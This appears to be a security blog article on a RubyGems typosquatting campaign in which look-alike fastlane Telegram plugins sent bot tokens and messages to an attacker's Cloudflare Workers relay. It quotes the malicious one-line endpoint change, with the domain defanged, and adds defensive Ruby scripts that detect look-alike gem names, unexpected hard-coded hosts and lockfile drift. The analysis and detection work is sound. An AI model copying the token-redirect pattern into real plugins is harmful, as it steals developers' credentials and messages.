In a supply chain attack against the RubyGems ecosystem, cybercriminals have published look-alike packages to steal developer credentials and communications. The campaign piggybacks on a geopolitical event, Vietnam’s recent ban on Telegram, to harvest Telegram bot tokens, chat identifiers, message content, and attached files.
Background on RubyGems and Supply Chain Attacks
RubyGems is a package manager for the Ruby programming language, allowing developers to distribute and manage libraries, known as gems. While this system facilitates software development, it also presents opportunities for malicious actors to introduce harmful code into widely used packages.
Supply chain attacks involve compromising software development processes to distribute malicious code. By infiltrating trusted components, attackers can affect numerous downstream users, making these attacks particularly insidious.
Details of the Malicious Campaign
The attackers employed typosquatting, a technique where malicious packages are named similarly to legitimate ones, hoping developers will inadvertently install them. In this case, two malicious gems were identified: `fastlane-plugin-telegram-proxy` and `fastlane-plugin-proxy_teleram`. These were designed to mimic the legitimate `fastlane-plugin-telegram`, a widely used plugin with over 600,000 downloads that facilitates sending deployment notifications to Telegram channels from CI/CD pipelines.
The timing of this attack is notable. The malicious packages appeared shortly after Vietnam’s nationwide blocking of Telegram on May 21, 2025. The threat actors marketed these gems as proxy plugins, exploiting the increased demand for Telegram workarounds among developers affected by the ban. This opportunistic approach underscores how cybercriminals rapidly adapt to exploit geopolitical events for targeted supply chain attacks.
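Both malicious names reuse the real plugin’s words and either append one (`-proxy`) or reorder and misspell one (`proxy_teleram`). The following check, an added example that is not code from the article or from fastlane, flags gem names that sit within a couple of edits of a known gem or that keep a known gem’s vocabulary (one word possibly misspelt) and add extras. `KNOWN_GEMS` and the names it scans are a constructed allow-list for the demo; in practice you would feed it the names from your own Gemfile.lock and a list of gems you actually intend to use.

```ruby
# Added example, not code from the original article or from fastlane:
# flag gem names that are near-misses of well-known gems, the shape of the two
# packages in this campaign. KNOWN_GEMS and the names checked below are a
# constructed allow-list for the demo.
require "set"

KNOWN_GEMS = %w[
  fastlane
  fastlane-plugin-telegram
  fastlane-plugin-versioning
  rails
  nokogiri
].freeze

# Optimal-string-alignment distance: insert, delete, substitute and
# adjacent-transposition each cost 1. "teleram" -> "telegram" is 1.
def edit_distance(a, b)
  d = Array.new(a.length + 1) { |i| Array.new(b.length + 1) { |j| i.zero? ? j : (j.zero? ? i : 0) } }
  (1..a.length).each do |i|
    (1..b.length).each do |j|
      cost = a[i - 1] == b[j - 1] ? 0 : 1
      d[i][j] = [d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost].min
      if i > 1 && j > 1 && a[i - 1] == b[j - 2] && a[i - 2] == b[j - 1]
        d[i][j] = [d[i][j], d[i - 2][j - 2] + 1].min
      end
    end
  end
  d[a.length][b.length]
end

# Split "fastlane-plugin-proxy_teleram" into its words so reordered or
# appended tokens compare on vocabulary, not raw characters.
def tokens(name)
  name.downcase.split(/[-_]/).reject(&:empty?).to_set
end

# Returns the known gem that +name+ impersonates, or nil when the name is an
# exact match or does not resemble anything on the list. Two patterns are
# caught: a whole-name typo within +max_distance+ edits, and a multi-word name
# that keeps a known gem's words (one possibly misspelt) and appends extras.
def typosquat_candidate(name, known = KNOWN_GEMS, max_distance: 2)
  return nil if known.include?(name)

  near = known.find { |good| edit_distance(name, good) <= max_distance }
  return near if near

  cand = tokens(name)
  known.each do |good|
    good_tokens = tokens(good)
    next if good_tokens.size < 3 # one- or two-word names give too many false hits

    shared = cand & good_tokens
    missing = good_tokens - shared # known words not present verbatim
    extra = cand - shared          # words the candidate adds
    next unless missing.size <= 1 && extra.any?

    return good if missing.empty? # e.g. fastlane-plugin-telegram-proxy
    return good if extra.any? { |t| edit_distance(t, missing.first) <= max_distance } # e.g. proxy_teleram
  end
  nil
end

# Maps each suspicious name to the gem it resembles.
def scan_names(names, known = KNOWN_GEMS)
  names.each_with_object({}) do |n, out|
    target = typosquat_candidate(n, known)
    out[n] = target if target
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed input mixing legitimate names with the two gems from the campaign.
  sample = %w[fastlane fastlane-plugin-telegram fastlane-plugin-telegram-proxy
              fastlane-plugin-proxy_teleram nokogiri]
  scan_names(sample).each { |bad, good| puts "#{bad} looks like #{good}" }
end
```

The token rule deliberately ignores one- and two-word known gems: almost any name shares a word with `rails`, so only the whole-name edit distance is applied there. Expect false positives on legitimately named forks; the point is to force a human look before `bundle install`, not to block automatically.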
Technical Analysis of the Infection Mechanism
What makes this attack effective is how little code changed. The threat actors copied the original project’s README, preserved the public API, and retained the expected plugin behavior while making only one critical change: the destination of the outbound request.
In the legitimate `fastlane-plugin-telegram`, messages are sent directly to Telegram’s official API using the standard endpoint:
```ruby
uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")
```
However, in the malicious versions, this line was replaced with a hardcoded command and control (C2) endpoint:
```ruby
# Threat actor's proxy C2 endpoint; not Telegram (domain defanged with [.])
uri = URI.parse("https://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev/bot#{token}/sendMessage")
```
Because the Telegram Bot API carries the bot token in the URL path, every request the plugin makes now hands the token, the chat identifier, the message content, and any uploaded file to the attacker’s server. If that server relays the request on to Telegram, as a proxy would, the notification still arrives and the developer sees nothing wrong.
The malicious endpoint, hosted on Cloudflare Workers, presents itself as a benign Telegram Bot API proxy, claiming not to store or modify bot tokens. However, the implementation remains entirely opaque, with no published source code or transparency measures that would characterize a legitimate proxy service.
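A one-line change of destination is easy to miss in a README review but easy to catch mechanically. The scanner below, an added example that is not code from the article or from fastlane, lists every HTTP(S) host hard-coded in a gem’s Ruby sources and reports any that are not on the allow-list of hosts the plugin is supposed to talk to. `SAMPLE_SOURCES` is constructed to stand in for files obtained with `gem unpack`; the proxy host in it is a placeholder, not the campaign’s real domain.

```ruby
# Added example, not code from the original article or from fastlane: list the
# HTTP(S) hosts hard-coded in a gem's Ruby sources and flag any that are not on
# the allow-list for what the plugin is supposed to talk to. SAMPLE_SOURCES is
# constructed; the attacker-style host is a stand-in, not the real indicator.

ALLOWED_HOSTS = %w[api.telegram.org].freeze

# Matches http(s) URLs in string literals, including ones with Ruby
# interpolation such as ".../bot#{token}/sendMessage".
URL_RE = %r{https?://[^\s"'`)]+}

# Returns the unique, lower-cased host names referenced in +source+.
def hosts_in(source)
  source.scan(URL_RE).map do |url|
    authority = url.sub(%r{\Ahttps?://}, "").split(%r{[/?#]}, 2).first
    authority.sub(/\A[^@]*@/, "").sub(/:\d+\z/, "").downcase # drop userinfo and port
  end.uniq
end

# Audits { path => source } and returns one finding per off-policy host.
def audit_endpoints(sources, allowed = ALLOWED_HOSTS)
  findings = []
  sources.each do |path, text|
    hosts_in(text).each do |host|
      next if allowed.include?(host)

      reason = if host.end_with?(".workers.dev")
                 "Cloudflare Workers endpoint standing in front of the real API"
               else
                 "host not on the allow-list"
               end
      findings << { file: path, host: host, reason: reason }
    end
  end
  findings
end

# Constructed stand-ins for files you would get from `gem unpack <gem>`:
# the legitimate call, and the same line rewired to a proxy host.
SAMPLE_SOURCES = {
  "telegram/helper/telegram_helper.rb" => <<~'RUBY',
    uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")
  RUBY
  "telegram_proxy/helper/telegram_helper.rb" => <<~'RUBY'
    # proxy host below is a constructed placeholder, not the campaign's domain
    uri = URI.parse("https://example-relay.workers.dev/bot#{token}/sendMessage")
  RUBY
}.freeze

if __FILE__ == $PROGRAM_NAME
  audit_endpoints(SAMPLE_SOURCES).each do |f|
    puts "#{f[:file]}: #{f[:host]} (#{f[:reason]})"
  end
end
```

Run it over the unpacked gem directory (read each `*.rb` into the hash) before the first install, and again whenever the lockfile bumps the version; a plugin whose only job is to call `api.telegram.org` has no business referencing any other host.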
Implications and Potential Impact
The impact of this attack extends beyond simple credential theft. Fastlane operates within CI/CD pipelines that handle sensitive assets, including signing keys, release binaries, and environment secrets. Compromising these pipelines could lead to unauthorized access to software build and release workflows, potentially affecting the integrity of software products and the security of end-users.
Moreover, the damage does not end when the malicious gem is removed. A stolen bot token remains valid until it is revoked (through BotFather), so an attacker who captured one keeps access to the victim’s Telegram bot and the conversations it can read until someone notices and rotates it.
Broader Context of Supply Chain Attacks
This incident is part of a broader trend of supply chain attacks targeting open-source ecosystems. In recent years, there have been multiple instances where malicious actors have infiltrated package repositories to distribute harmful code.
For example, in April 2020, over 700 malicious packages were discovered in the RubyGems repository. These packages were designed to intercept Bitcoin payments on Windows devices by replacing cryptocurrency wallet addresses in the clipboard with attacker-controlled addresses. The malicious packages were downloaded nearly 100,000 times, highlighting the scale and potential impact of such attacks.
Similarly, in December 2020, two RubyGems packages, `pretty_color` and `ruby-bitcoin`, were found to contain malware that persistently ran on infected Windows machines. These packages monitored the clipboard for cryptocurrency wallet addresses and replaced them with addresses under the attacker’s control, aiming to divert funds during transactions.
Mitigation and Recommendations
To protect against such supply chain attacks, developers and organizations should adopt several best practices:
1. Implement Multi-Factor Authentication (MFA): Enforce MFA on the RubyGems.org, source-control, and CI accounts of every maintainer and release engineer. This does not stop typosquatting, but it closes the other common route into a pipeline, takeover of a legitimate publisher’s account.
2. Verify Package Integrity: Before adding a gem, confirm that its name exactly matches the project you intend (the two gems here differed from the real plugin by a single word), that the homepage and source repository listed on RubyGems.org belong to the upstream project, and, for anything that handles credentials, unpack the gem and compare its contents with that repository rather than trusting the README.
3. Monitor Dependencies: Commit Gemfile.lock, review every lockfile change in code review, and run a dependency scanner (for example bundler-audit) in CI, so that a new, removed, or re-sourced gem is noticed when it appears rather than after an incident.
4. Limit Dependency Usage: Minimize the use of external dependencies, especially single-purpose plugins that handle secrets, to reduce the attack surface.
5. Stay Informed: Keep abreast of security advisories and updates from package repositories and the broader security community.
By implementing these measures, developers can enhance the security of their software supply chains and mitigate the risks associated with malicious packages.
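The monitoring step above is mostly a matter of reading Gemfile.lock diffs consistently. The script below, an added example that is not code from the article or from Bundler, parses two lockfile snapshots and reports gems added, removed, or re-versioned, plus any gem source that is not the trusted remote. Both lockfiles are constructed for the demo and their version numbers are placeholders; the “after” snapshot swaps the real Telegram plugin for a look-alike pulled from a git remote, which is exactly the kind of change a reviewer should stop on.

```ruby
# Added example, not code from the original article or from Bundler: detect
# drift between two Gemfile.lock snapshots (gems added, removed or re-versioned,
# and gem sources that are not the trusted remote). Both lockfiles are
# constructed for the demo; the versions are placeholders.

TRUSTED_REMOTES = %w[https://rubygems.org/].freeze

# Returns { remotes: [...], specs: { name => version } } from lockfile text.
# Only the 4-space-indented "name (version)" lines are specs; the 6-space
# lines beneath them are that spec's dependencies and are ignored.
def parse_lockfile(text)
  remotes = []
  specs = {}
  section = nil
  text.each_line do |line|
    case line
    when /\A(GEM|GIT|PATH|PLATFORMS|DEPENDENCIES|BUNDLED WITH)\s*\z/
      section = Regexp.last_match(1)
    when /\A  remote: (\S+)/
      remotes << Regexp.last_match(1) if %w[GEM GIT].include?(section)
    when /\A    (\S+) \(([^)]+)\)\s*\z/
      specs[Regexp.last_match(1)] = Regexp.last_match(2) if %w[GEM GIT PATH].include?(section)
    end
  end
  { remotes: remotes.uniq, specs: specs }
end

# Compares two lockfiles and returns what a reviewer should look at.
def lockfile_drift(before_text, after_text, trusted = TRUSTED_REMOTES)
  before = parse_lockfile(before_text)[:specs]
  after_lock = parse_lockfile(after_text)
  after = after_lock[:specs]
  common = before.keys & after.keys
  {
    added: (after.keys - before.keys).sort,
    removed: (before.keys - after.keys).sort,
    changed: common.select { |g| before[g] != after[g] }.map { |g| [g, before[g], after[g]] },
    untrusted_remotes: after_lock[:remotes].reject { |r| trusted.include?(r) }
  }
end

# Constructed lockfiles: the "after" snapshot swaps the real Telegram plugin for
# the look-alike and pulls it from a git remote instead of rubygems.org.
LOCK_BEFORE = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      fastlane (2.0.0)
        addressable (>= 2.8, < 3.0.0)
      fastlane-plugin-telegram (1.0.0)
      rake (13.0.0)

  PLATFORMS
    ruby

  DEPENDENCIES
    fastlane
    fastlane-plugin-telegram

  BUNDLED WITH
     2.5.0
LOCK

LOCK_AFTER = <<~LOCK
  GIT
    remote: https://git.example.invalid/mirror/telegram-proxy.git
    revision: 0000000000000000000000000000000000000000
    specs:
      fastlane-plugin-telegram-proxy (0.1.0)

  GEM
    remote: https://rubygems.org/
    specs:
      fastlane (2.1.0)
        addressable (>= 2.8, < 3.0.0)
      rake (13.0.0)

  PLATFORMS
    ruby

  DEPENDENCIES
    fastlane
    fastlane-plugin-telegram-proxy!

  BUNDLED WITH
     2.5.0
LOCK

if __FILE__ == $PROGRAM_NAME
  lockfile_drift(LOCK_BEFORE, LOCK_AFTER).each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

Wire it into CI by passing the lockfile from the merge base and the one from the pull request; fail the job on any untrusted remote and require an explicit approval for every added gem.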
Conclusion
The exploitation of RubyGems to exfiltrate Telegram tokens and messages underscores the evolving nature of supply chain attacks. Cybercriminals are increasingly leveraging geopolitical events and minimal code modifications to infiltrate trusted ecosystems. It is imperative for developers and organizations to remain vigilant, adopt robust security practices, and foster a culture of security awareness to safeguard against such threats.